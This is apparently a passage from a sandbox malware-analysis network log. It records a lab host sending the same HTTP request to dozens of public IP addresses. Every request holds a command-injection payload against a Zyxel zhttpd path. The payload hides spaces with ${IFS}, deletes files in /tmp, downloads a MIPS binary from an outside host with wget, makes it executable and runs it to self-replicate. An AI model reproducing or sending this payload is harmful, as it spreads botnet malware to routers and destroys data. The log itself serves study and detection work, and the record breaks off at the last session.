                              Mar 31, 2024 08:42:06.328607082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8354192.168.2.134183240.163.11.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328629971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8355192.168.2.1336412203.48.167.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328682899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8356192.168.2.1333376112.61.147.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328742027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8357192.168.2.1339588223.253.238.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328813076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8358192.168.2.133864818.57.155.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328846931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8359192.168.2.134891094.198.216.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328911066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8360192.168.2.1340916154.232.109.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.328955889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8361192.168.2.1348906202.134.110.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329016924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8362192.168.2.134010059.215.95.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329056025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8363192.168.2.1337032186.57.233.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329127073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8364192.168.2.1358718110.166.78.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329188108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8365192.168.2.134520693.204.50.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329246998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8366192.168.2.133516897.247.231.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329278946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8367192.168.2.135690887.185.54.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329334974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8368192.168.2.135273276.196.30.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329396009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8369192.168.2.1333760142.168.133.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329430103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8370192.168.2.1348646205.52.119.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329492092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8371192.168.2.133982452.83.251.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329545975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8372192.168.2.1345482153.244.193.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329611063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8373192.168.2.133818675.72.237.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329663992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8374192.168.2.1345736119.81.71.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329713106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8375192.168.2.135718881.165.161.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329756021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8376192.168.2.1348226102.15.223.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329811096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8377192.168.2.1350174198.26.40.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329868078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8378192.168.2.133518632.38.188.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329916954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8379192.168.2.1360116202.163.152.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.329965115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8380192.168.2.133802070.181.37.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330012083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8381192.168.2.134336293.38.51.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330082893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8382192.168.2.1355204216.5.153.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330135107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8383192.168.2.134081242.164.30.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330183029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8384192.168.2.1359068149.196.94.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330241919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8385192.168.2.1336086115.237.41.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330280066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8386192.168.2.1338864212.179.248.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330341101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8387192.168.2.1339576196.185.255.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330380917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8388192.168.2.1348108126.103.76.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330416918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8389192.168.2.1344566149.162.134.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330487013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8390192.168.2.135723287.35.227.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330526114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8391192.168.2.135879637.247.139.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330560923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8392192.168.2.134212041.52.136.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330657959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8393192.168.2.134248875.151.27.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330678940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8394192.168.2.13342385.159.241.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330739975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8395192.168.2.135927857.77.74.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330771923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8396192.168.2.134164235.23.137.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330835104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8397192.168.2.133933038.101.21.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330862045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8398192.168.2.1339810207.58.102.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330924034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8399192.168.2.134787489.243.64.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.330970049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8400192.168.2.1357638190.218.149.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331021070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8401192.168.2.133775068.50.63.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331075907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8402192.168.2.1356188116.244.137.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331094027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8403192.168.2.1358538140.63.36.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331150055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8404192.168.2.133457253.89.58.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331197977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8405192.168.2.1349606184.150.166.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331237078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8406192.168.2.1340946159.136.68.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331290960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8407192.168.2.1356464119.45.122.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331337929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8408192.168.2.135135884.93.255.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331372023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8409192.168.2.134139093.12.247.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331430912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8410192.168.2.135279685.140.209.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331475019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8411192.168.2.133685066.185.23.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331518888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8412192.168.2.1341692209.60.113.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331581116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8413192.168.2.135500250.207.7.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331602097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8414192.168.2.133352861.17.235.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331650972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8415192.168.2.133802243.170.159.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331695080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8416192.168.2.1355926161.137.125.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331715107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8417192.168.2.134735844.60.217.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331784010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8418192.168.2.134969477.81.108.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331811905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8419192.168.2.1339714144.169.179.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331870079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8420192.168.2.1346140158.105.156.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331926107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8421192.168.2.1356692152.28.57.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:06.331950903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8422192.168.2.1360738114.98.165.245443
                              TimestampBytes transferredDirectionData
